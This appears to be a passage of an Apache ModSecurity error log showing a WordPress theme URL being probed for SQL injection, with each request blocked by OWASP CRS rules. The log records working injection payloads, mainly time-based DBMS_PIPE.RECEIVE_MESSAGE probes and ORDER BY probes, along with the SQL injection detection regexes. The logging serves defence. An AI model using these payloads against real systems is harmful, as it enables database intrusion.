1894=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(70)||CHR(66)||CHR(75),5)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExURoAeojmxWlFps7wqgAAANM"] [Fri Jul 12 08:36:17.632585 2024] [:error] [pid 30143:tid 139783720359680] [client 141.98.81.44:38060] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47') AND 1894=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(70)||CHR(66)||CHR(75),5) AND ('Noex'='Noex"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExURoAeojmxWlFps7wqwAAANE"] [Fri Jul 12 08:36:17.945061 2024] [:error] [pid 29519:tid 139783745537792] [client 141.98.81.44:38062] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47' AND 1894=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(70)||CHR(66)||CHR(75),5) AND 'Uctj'='Uctj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExUTEhNOprNgeRyDcP7QAAAI4"] [Fri Jul 12 08:36:18.247262 2024] [:error] [pid 29519:tid 139783728752384] [client 141.98.81.44:38064] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47%' AND 1894=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(70)||CHR(66)||CHR(75),5) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExUjEhNOprNgeRyDcP7gAAAJA"] [Fri Jul 12 08:36:18.536765 2024] [:error] [pid 29519:tid 139783670003456] [client 141.98.81.44:38066] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 1894=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(70)||CHR(66)||CHR(75),5)-- OtXF"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExUjEhNOprNgeRyDcP7wAAAJc"] [Fri Jul 12 08:36:19.203041 2024] [:error] [pid 29519:tid 139783695181568] [client 141.98.81.44:38068] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47) ORDER BY 1-- ogEN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExUzEhNOprNgeRyDcP8AAAAJQ"] [Fri Jul 12 08:36:19.717063 2024] [:error] [pid 29518:tid 139783795894016] [client 141.98.81.44:38070] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExU6g1rY6w-xq1eShSWAAAAEg"] [Fri Jul 12 08:36:19.998859 2024] [:error] [pid 29519:tid 139783686788864] [client 141.98.81.44:38072] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExUzEhNOprNgeRyDcP8QAAAJU"] [Fri Jul 12 08:36:20.382040 2024] [:error] [pid 29519:tid 139783770715904] [client 141.98.81.44:38074] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExVDEhNOprNgeRyDcP8gAAAIs"] [Fri Jul 12 08:36:20.654188 2024] [:error] [pid 30143:tid 139783737145088] [client 141.98.81.44:38076] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExVBoAeojmxWlFps7wrAAAAM8"] [Fri Jul 12 08:36:21.021409 2024] [:error] [pid 30143:tid 139783924430592] [client 141.98.81.44:38078] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExVRoAeojmxWlFps7wrQAAAME"] [Fri Jul 12 08:36:21.400956 2024] [:error] [pid 29517:tid 139783932823296] [client 141.98.81.44:38080] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExVfUCh5vf5PuAcijj9wAAAAA"] [Fri Jul 12 08:36:21.689393 2024] [:error] [pid 29517:tid 139783695181568] [client 141.98.81.44:38082] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExVfUCh5vf5PuAcijj-AAAABQ"] [Fri Jul 12 08:36:22.111385 2024] [:error] [pid 30143:tid 139783916037888] [client 141.98.81.44:38084] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExVhoAeojmxWlFps7wrgAAAMI"] [Fri Jul 12 08:36:22.423939 2024] [:error] [pid 29519:tid 139783787501312] [client 141.98.81.44:38086] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExVjEhNOprNgeRyDcP8wAAAIk"] [Fri Jul 12 08:36:22.763091 2024] [:error] [pid 29518:tid 139783932823296] [client 141.98.81.44:38088] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExVqg1rY6w-xq1eShSWQAAAEA"] [Fri Jul 12 08:36:23.148340 2024] [:error] [pid 29517:tid 139783762323200] [client 141.98.81.44:38090] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47 ORDER BY 1-- atfJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExV_UCh5vf5PuAcijj-QAAAAw"] [Fri Jul 12 08:36:32.071104 2024] [:error] [pid 29517:tid 139783804286720] [client 141.98.81.44:38092] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExYPUCh5vf5PuAcijj-gAAAAc"] [Fri Jul 12 08:36:32.329155 2024] [:error] [pid 29517:tid 139783661610752] [client 141.98.81.44:38094] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExYPUCh5vf5PuAcijj-wAAABg"] [Fri Jul 12 08:36:32.567120 2024] [:error] [pid 29517:tid 139783795894016] [client 141.98.81.44:38096] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExYPUCh5vf5PuAcijj_AAAAAg"] [Fri Jul 12 08:36:32.802815 2024] [:error] [pid 29517:tid 139783678396160] [client 141.98.81.44:38098] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExYPUCh5vf5PuAcijj_QAAABY"] [Fri Jul 12 08:36:33.067940 2024] [:error] [pid 30143:tid 139783932823296] [client 141.98.81.44:38100] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExYRoAeojmxWlFps7wrwAAAMA"] [Fri Jul 12 08:36:33.403075 2024] [:error] [pid 30143:tid 139783907645184] [client 141.98.81.44:38102] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExYRoAeojmxWlFps7wsAAAAMM"] [Fri Jul 12 08:36:33.826420 2024] [:error] [pid 30143:tid 139783678396160] [client 141.98.81.44:38104] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExYRoAeojmxWlFps7wsQAAANY"] [Fri Jul 12 08:36:34.236036 2024] [:error] [pid 29519:tid 139783804286720] [client 141.98.81.44:38106] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExYjEhNOprNgeRyDcP9AAAAIc"] [Fri Jul 12 08:36:34.552994 2024] [:error] [pid 30143:tid 139783890859776] [client 141.98.81.44:38108] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExYhoAeojmxWlFps7wsgAAAMU"] [Fri Jul 12 08:36:34.924115 2024] [:error] [pid 30143:tid 139783899252480] [client 141.98.81.44:38110] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExYhoAeojmxWlFps7wswAAAMQ"] [Fri Jul 12 08:36:35.246366 2024] [:error] [pid 29519:tid 139783890859776] [client 141.98.81.44:38112] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47') ORDER BY 1-- mfwB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExYzEhNOprNgeRyDcP9QAAAIU"] 